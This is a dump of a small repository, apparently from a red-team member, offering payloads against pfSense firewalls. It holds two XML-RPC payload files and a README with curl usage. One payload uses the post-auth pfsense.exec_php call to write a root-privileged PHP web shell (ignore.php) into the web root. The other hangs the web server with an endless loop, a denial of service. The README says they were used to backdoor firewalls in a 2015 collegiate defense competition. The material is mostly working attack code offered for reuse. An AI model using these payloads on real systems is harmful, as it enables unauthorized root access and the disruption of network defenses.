├── images
    └── backdoored.png
├── pfsense_dos
├── pfsense_exec
├── LICENSE
└── README.md


/images/backdoored.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chadillac/pfsense_xmlrpc_backdoor/HEAD/images/backdoored.png


--------------------------------------------------------------------------------
/pfsense_dos:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="iso-8859-1"?>
2 | <methodCall>
3 | <methodName>pfsense.exec_php</methodName>
4 | <params>
5 | <param><value><string>password</string></value></param>
6 | <param><value><string>exec('while true; do sleep 1; done');</string></value></param>
7 | </params>
8 | </methodCall>
9 | 


--------------------------------------------------------------------------------
/pfsense_exec:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="iso-8859-1"?>
2 | <methodCall>
3 | <methodName>pfsense.exec_php</methodName>
4 | <params>
5 | <param><value><string>password</string></value></param>
6 | <param><value><string>exec('echo \'&lt;pre&gt; &lt;?php $res = system($_GET["cmd"]); echo $res ?&gt; &lt;/pre&gt;\' > /usr/local/www/ignore.php');</string></value></param>
7 | </params>
8 | </methodCall>
9 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2015 Chad Seaman
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 
23 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Quick Introduction
 2 | 
 3 | This is a sample payload and example use of abusing pfSense's xmlrpc.php functions to establish a backdoor
 4 | and get root level access to pfSense firewalls.
 5 | 
 6 | This exploit is post-auth (for the admin account) and as it stands is considered a non-issue according to 
 7 | the pfSense security team, since this password is shared for both the web and ssh services (ssh wasn't WAN 
 8 | accessible when this was used). This authentication method bypasses security rules  that apply to auth attempts 
 9 | against the web and is treated as a `local_backed` authentication attempt.  Any PHP shells that are dropped
10 | to web root will run with full root perms.  It is also worth noting the web server appears to be single threaded
11 | so spinning up a long running exec (such as a loop or ping without count) will effectively DoS the web server
12 | and stop web based authentication and administration.
13 | 
14 | This was discovered during the 2015 [SECCDC](http://en.wikipedia.org/wiki/Southeastern_Collegiate_Cyber_Defense_Competition) 
15 | competition and was used to drop active backdoors on teams firewalls. I am releasing it because I thought it was interesting and could be handy 
16 | for other Red Teams.  
17 | 
18 | ## The XML PHP backdoor payload
19 | This payload can be sent to the pfSense box, it will utilize the `pfsense.exec_php` method to write a very simple 
20 | php backdoor named `ignore.php` to the webroot on the firewall.
21 | 
22 | ```
23 | <?xml version="1.0" encoding="iso-8859-1"?>
24 | <methodCall>
25 | <methodName>pfsense.exec_php</methodName>
26 | <params>
27 | <param><value><string>password</string></value></param>
28 | <param><value><string>exec('echo \'&lt;pre&gt; &lt;?php $res = system($_GET["cmd"]); echo $res ?&gt; &lt;/pre&gt;\' > /usr/local/www/ignore.php');</string></value></param>
29 | </params>
30 | </methodCall>
31 | ```
32 | 
33 | ## Simple usage
34 | Using this payload against the pfSense xmlrpc.php file is a simple HTTP request using curl
35 | 
36 | ```
37 | curl --data @pfsense_exec http://10.10.100.1/xmlrpc.php
38 | ```
39 | 
40 | ## The backdoor in use at SECCDC
41 | ![ignore.php in use](/images/backdoored.png)
42 | 
43 | ## The XML DoS
44 | This payload can be sent to the pfSense box, it will lock up the web server so web based authentication and
45 | administration will not function.
46 | 
47 | ```
48 | <?xml version="1.0" encoding="iso-8859-1"?>
49 | <methodCall>
50 | <methodName>pfsense.exec_php</methodName>
51 | <params>
52 | <param><value><string>password</string></value></param>
53 | <param><value><string>exec('while true; do sleep 1; done');</string></value></param>
54 | </params>
55 | </methodCall>
56 | ```
57 | 
58 | ## Simple usage
59 | Using this payload against the pfSense xmlrpc.php file is a simple HTTP request using curl
60 | 
61 | ```
62 | curl --data @pfsense_dos http://10.10.100.1/xmlrpc.php
63 | ```
64 | 
65 | 
66 | 
67 | 


--------------------------------------------------------------------------------